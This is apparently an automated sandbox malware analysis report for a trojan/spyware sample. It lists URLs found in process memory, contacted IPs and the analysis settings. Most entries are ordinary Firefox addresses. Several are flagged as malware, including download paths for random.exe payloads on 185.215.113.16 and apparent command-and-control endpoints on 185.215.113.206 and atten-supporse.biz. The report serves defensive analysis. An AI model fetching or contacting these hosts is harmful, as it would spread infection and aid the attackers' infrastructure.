                                                                                            https://ac.duckduckgo.com/ac/getfirefox.exe, 0000001D.00000002.3385444273.00000214A7B73000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://185.215.113.206;f570600774.exe, 0000000E.00000002.3190013417.000000000145E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://github.com/mozilla-services/screenshotsfirefox.exe, 0000001D.00000002.3385444273.00000214A7B73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3260407550.00000214AB431000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3404418065.00000214AB6B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000003.3260074424.00000214AB40F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://addons.mozilla.orgADD_EXTENSION_BUTTON_STAFF_3defaults_and_os_integrationfirefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=panel-deffirefox.exe, 0000001D.00000002.3385444273.00000214A7B73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3322309310.00000214ACB79000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://atten-supporse.biz/apiU.176986cc9c.exe, 0000000F.00000003.3271110389.00000000053DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: malware
                                                                                                    unknown
                                                                                                    https://firefox.settings.services.mozilla.com/v1_onDisplaySyncURIs/allKnownSenderfirefox.exe, 0000001D.00000002.3385444273.00000214A7B03000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://mail.yahoo.co.jp/compose/?To=%shttp://poczta.interia.pl/mh/?mailto=%shttp://win.mail.ru/cgi-firefox.exe, 0000001D.00000002.3385444273.00000214A7B73000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://firefox.settings.services.mozilla.com/v1ifirefox.exe, 0000001D.00000002.3389826733.00000214A7C00000.00000002.00000001.00040000.0000001B.sdmpfalse
                                                                                                          high
                                                                                                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYifirefox.exe, 0000001D.00000002.3394874901.00000214A892D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://ok.ru/firefox.exe, 0000001D.00000002.3385444273.00000214A7BE2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3421104125.00000214ADAB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabMozRequestFullScfirefox.exe, 0000001D.00000003.3359809610.00000214B3C1F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://www.google.com/policies/privacy/2firefox.exe, 0000001D.00000002.3391313912.00000214A7E00000.00000002.00000001.00040000.0000001C.sdmpfalse
                                                                                                                  high
                                                                                                                  http://win.mail.ru/cgi-bin/sentmsg?mailto=%sfirefox.exe, 0000001D.00000002.3385444273.00000214A7B73000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://www.ecosia.org/newtab/d0d9725343.exe, 0000000B.00000003.2903621269.00000000037FB000.00000004.00000800.00020000.00000000.sdmp, d0d9725343.exe, 0000000B.00000003.2903742030.00000000037F9000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3106258416.00000000057EC000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3106134459.00000000057EF000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3242225033.000000000541E000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3243660285.000000000541B000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3244478054.000000000541B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://185.215.113.206/c4becf79229cb002.phpgRLf570600774.exe, 0000000E.00000002.3190013417.00000000014A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: malware
                                                                                                                      unknown
                                                                                                                      http://185.215.113.16/steam/random.exeZPskotes.exe, 00000006.00000002.3482291787.000000000156A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: malware
                                                                                                                      unknown
                                                                                                                      https://static.adsafeprotected.com/firefox-etp-jsQUERY_CONTENT_FLAG_SELECTION_IME_SELECTEDCONVERTEDTfirefox.exe, 0000001D.00000002.3385444273.00000214A7B03000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://www.inbox.lv/rfc2368/?value=%shandlerSvcfirefox.exe, 0000001D.00000002.3385444273.00000214A7B73000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://getpocket.com/firefox.exe, 0000001D.00000002.3389826733.00000214A7C00000.00000002.00000001.00040000.0000001B.sdmpfalse
                                                                                                                          high
                                                                                                                          https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/recordsmrfirefox.exe, 0000001D.00000002.3391313912.00000214A7E00000.00000002.00000001.00040000.0000001C.sdmpfalse
                                                                                                                            high
                                                                                                                            https://www.bbc.co.uk/firefox.exe, 0000001D.00000002.3456418120.000028C352713000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3422411758.00000214ADC4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=firefox.exe, 0000001D.00000003.3329882750.00000214AF751000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3421733253.00000214ADB03000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://bugzilla.mofirefox.exe, 0000001D.00000002.3420072274.00000214AD868000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://static.adsafeprotected.com/firefox-etp-jsfirefox.exe, 0000001D.00000002.3408991340.00000214ABF80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3332867628.00000214ACD45000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3356098124.00000214ACD6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3385444273.00000214A7B03000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://80.82.65.70/files/download0/files/downloadf30149f036.exe, 0000000C.00000002.3479111946.0000000000F69000.00000004.00000020.00020000.00000000.sdmp, f30149f036.exe, 0000000C.00000002.3488485448.00000000055CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    https://firefox.settings.services.mozilla.com/v1i#firefox.exe, 0000001D.00000002.3389826733.00000214A7C00000.00000002.00000001.00040000.0000001B.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://spocs.getpocket.com/firefox.exe, 0000001D.00000002.3394874901.00000214A890C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3397502544.00000214A939E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3433552608.00000214AF32D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3447537019.00000214B5D38000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://atten-supporse.biz/176986cc9c.exe, 0000000D.00000003.3218675497.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3190424295.00000000012C1000.00000004.00000020.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3164980897.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3164239132.00000000012C5000.00000004.00000020.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3137799586.00000000012C6000.00000004.00000020.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3106209007.00000000012C6000.00000004.00000020.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3339750999.00000000053D8000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3271110389.00000000053DD000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3342488948.00000000053D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://ebay.comPfirefox.exe, 0000001D.00000002.3457171738.00003265CC204000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://www.iqiyi.com/firefox.exe, 0000001D.00000002.3385444273.00000214A7BE2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3456418120.000028C352713000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3422411758.00000214ADC4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3421104125.00000214ADAB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://185.215.113.16/well/random.exe_Qskotes.exe, 00000006.00000002.3482291787.000000000156A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                              unknown
                                                                                                                                              http://fb.me/use-check-prop-typesGfirefox.exe, 0000001D.00000002.3389826733.00000214A7C00000.00000002.00000001.00040000.0000001B.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://accounts.gofirefox.exe, 0000001D.00000002.3370890446.0000006AF5BD8000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                https://fb.me/react-polyfillsPfirefox.exe, 0000001D.00000002.3389826733.00000214A7C00000.00000002.00000001.00040000.0000001B.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://bugzilla.mozilla.org/show_bug.cgi?id=1584464firefox.exe, 0000001D.00000002.3434823097.00000214AF491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://fb.me/react-polyfillsOfirefox.exe, 0000001D.00000002.3389826733.00000214A7C00000.00000002.00000001.00040000.0000001B.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://yandex.comfirefox.exe, 0000001D.00000002.3391313912.00000214A7E00000.00000002.00000001.00040000.0000001C.sdmp, firefox.exe, 0000001D.00000002.3457171738.00003265CC204000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://youtube.com/accoSt?=https://afirefox.exe, 0000001D.00000002.3370890446.0000006AF5BD8000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://account.bellmedia.cfirefox.exe, 0000001D.00000002.3421733253.00000214ADB03000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://www.amazon.com/exec/obidos/external-search/main/anti-tracking-url-decorationscheduleCheckForfirefox.exe, 0000001D.00000002.3385444273.00000214A7B73000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://youtube.com/firefox.exe, 0000001D.00000002.3443577003.00000214B3C77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3341237846.00000214B3C77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3329574781.00000214B3C77000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://login.microsoftonline.comfirefox.exe, 0000001D.00000002.3421733253.00000214ADB21000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://addons.mozilla.org/user-media/addon_icons/784/784287-64.png?modified=mcrushedThisfirefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/f0f51715-7f5e-48de-839firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://www.zhihu.com/firefox.exe, 0000001D.00000002.3385444273.00000214A7BE2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3394874901.00000214A890C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3456418120.000028C352713000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3421104125.00000214ADAB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://x1.c.lencr.org/0d0d9725343.exe, 0000000B.00000003.2953198122.00000000038BD000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3165168016.000000000586F000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3314092869.0000000005414000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3412078877.00000214AC441000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3434823097.00000214AF403000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://x1.i.lencr.org/0d0d9725343.exe, 0000000B.00000003.2953198122.00000000038BD000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3165168016.000000000586F000.00000004.00000800.00020000.00000000.sdmp, 176986cc9c.exe, 0000000F.00000003.3314092869.0000000005414000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3412078877.00000214AC441000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3434823097.00000214AF403000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://infra.spec.whatwg.org/#ascii-whitespacefirefox.exe, 0000001D.00000002.3436361649.00000214AF503000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingDocumentWriteIgnoredfirefox.exe, 0000001D.00000002.3442726709.00000214B3C0F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://static.adsafeprotected.com/firefox-etp-pixelcolor-mix(infirefox.exe, 0000001D.00000002.3385444273.00000214A7B03000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://duckduckgo.com/?t=ffab&q=firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://support.mozilla.org/products/firefoxgro.all176986cc9c.exe, 0000000F.00000003.3316379231.00000000054F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      http://185.215.113.43/Zu7JuNko/index.phpncodedM=skotes.exe, 00000006.00000002.3482291787.000000000156A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causeshttps://support.mozilla.orgfirefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings2firefox.exe, 0000001D.00000002.3426975852.00000214AEC69000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://mail.yahoo.co.jp/compose/?To=%sfirefox.exe, 0000001D.00000002.3385444273.00000214A7B73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3397502544.00000214A93AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://contile.services.mozilla.com/v1/tilesfirefox.exe, 0000001D.00000003.3329882750.00000214AF751000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://www.amazon.co.uk/firefox.exe, 0000001D.00000003.3318498425.00000214ABF64000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3422411758.00000214ADC4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://screenshots.firefox.com/firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://gpuweb.github.io/gpuweb/firefox.exe, 0000001D.00000002.3434823097.00000214AF491000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://firefox-source-docs.mozilla.org/remote/Security.htmlfirefox.exe, 0000001D.00000002.3391313912.00000214A7E00000.00000002.00000001.00040000.0000001C.sdmp, firefox.exe, 0000001D.00000002.3385444273.00000214A7B43000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      http://json-schema.org/draft-07/schema#-firefox.exe, 0000001D.00000002.3414473910.00000214AC854000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://www.wykop.pl/firefox.exe, 0000001D.00000002.3456418120.000028C352713000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://vk.com/firefox.exe, 0000001D.00000002.3385444273.00000214A7BE2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3421104125.00000214ADAB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            http://185.215.113.16/luma/random.exe-Pskotes.exe, 00000006.00000002.3482291787.000000000156A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            https://www.olx.pl/firefox.exe, 0000001D.00000002.3394874901.00000214A890C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3456418120.000028C352713000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3422411758.00000214ADC4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://mail.google.com/mail/?extsrc=mailto&url=%sFailedfirefox.exe, 0000001D.00000002.3385444273.00000214A7B73000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                http://185.215.113.206/c4becf79229cb002.phpphf570600774.exe, 0000000E.00000002.3190013417.00000000014B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4firefox.exe, 0000001D.00000003.3359809610.00000214B3C1F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2firefox.exe, 0000001D.00000003.3359809610.00000214B3C1F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://github.com/google/closure-compiler/issues/3177firefox.exe, 0000001D.00000002.3436361649.00000214AF503000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://www.google.com/complete/firefox.exe, 0000001D.00000002.3442726709.00000214B3C5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://gpuweb.github.io/gpuweb/getfirefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://support.mozilla.org/kb/firefox-crashes-troubleshoot-prevent-and-get-helpfirefox.exe, 0000001D.00000002.3391313912.00000214A7E00000.00000002.00000001.00040000.0000001C.sdmpfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://www.google.com/searchLOAD_ANONYMOUS_ALLOW_CLIENT_CERTctrlTab-showAll-containerfirefox.exe, 0000001D.00000002.3385444273.00000214A7B73000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              https://atten-supporse.biz:443/api176986cc9c.exe, 0000000D.00000003.3274382491.00000000012D0000.00000004.00000020.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3197174045.00000000012CD000.00000004.00000020.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3218627779.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3235485658.00000000012D0000.00000004.00000020.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3190538036.00000000012C6000.00000004.00000020.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3273337235.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3190424295.00000000012C1000.00000004.00000020.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3274066279.00000000012CB000.00000004.00000020.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3164980897.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, 176986cc9c.exe, 0000000D.00000003.3190825384.00000000012C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                https://developer.mozilla.org/docs/Web/API/Element/setPointerCaptureElementReleaseCaptureWarningElemfirefox.exe, 0000001D.00000003.3359809610.00000214B3C1F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.tsfirefox.exe, 0000001D.00000002.3431199683.00000214AF1C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    https://login.microsoftonline.comresource://normandy/lib/PrefUtils.sys.mjsresource://normandy/lib/Tefirefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    http://json-schema.org/draft-06/schema#firefox.exe, 0000001D.00000002.3414473910.00000214AC854000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                      https://www.avito.ru/firefox.exe, 0000001D.00000002.3385444273.00000214A7BE2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3456418120.000028C352713000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3422411758.00000214ADC4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3421104125.00000214ADAB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                        http://185.215.113.16/luma/random.exe;Pskotes.exe, 00000006.00000002.3482291787.000000000156A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                        • 75% < No. of IPs
                                                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                        185.215.113.43
                                                                                                                                                                                                                                        unknownPortugal
                                                                                                                                                                                                                                        206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                                                                                                                        104.21.48.1
                                                                                                                                                                                                                                        atten-supporse.bizUnited States
                                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                        80.82.65.70
                                                                                                                                                                                                                                        unknownNetherlands
                                                                                                                                                                                                                                        202425INT-NETWORKSCfalse
                                                                                                                                                                                                                                        185.215.113.16
                                                                                                                                                                                                                                        unknownPortugal
                                                                                                                                                                                                                                        206894WHOLESALECONNECTIONSNLfalse
                                                                                                                                                                                                                                        34.107.221.82
                                                                                                                                                                                                                                        prod.detectportal.prod.cloudops.mozgcp.netUnited States
                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                        35.244.181.201
                                                                                                                                                                                                                                        prod.balrog.prod.cloudops.mozgcp.netUnited States
                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                        172.67.139.78
                                                                                                                                                                                                                                        drive-connect.cyouUnited States
                                                                                                                                                                                                                                        13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                        34.117.188.166
                                                                                                                                                                                                                                        contile.services.mozilla.comUnited States
                                                                                                                                                                                                                                        139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                                                                                                                                                                                                        185.215.113.206
                                                                                                                                                                                                                                        unknownPortugal
                                                                                                                                                                                                                                        206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                                                                                                                        35.190.72.216
                                                                                                                                                                                                                                        prod.classify-client.prod.webservices.mozgcp.netUnited States
                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                        142.250.181.78
                                                                                                                                                                                                                                        youtube.comUnited States
                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                        34.160.144.191
                                                                                                                                                                                                                                        prod.content-signature-chains.prod.webservices.mozgcp.netUnited States
                                                                                                                                                                                                                                        2686ATGS-MMD-ASUSfalse
                                                                                                                                                                                                                                        31.41.244.11
                                                                                                                                                                                                                                        unknownRussian Federation
                                                                                                                                                                                                                                        61974AEROEXPRESS-ASRUfalse
                                                                                                                                                                                                                                        IP
                                                                                                                                                                                                                                        127.0.0.1
                                                                                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                        Analysis ID:1571920
                                                                                                                                                                                                                                        Start date and time:2024-12-09 21:07:07 +01:00
                                                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                        Overall analysis duration:0h 10m 44s
                                                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                        Number of analysed new started processes analysed:38
                                                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                                                        Sample name:file.exe
                                                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                                                        Classification:mal100.troj.spyw.evad.winEXE@55/31@28/14
                                                                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                                                                        • Successful, ratio: 87.5%
                                                                                                                                                                                                                                        HCA Information:Failed
                                                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
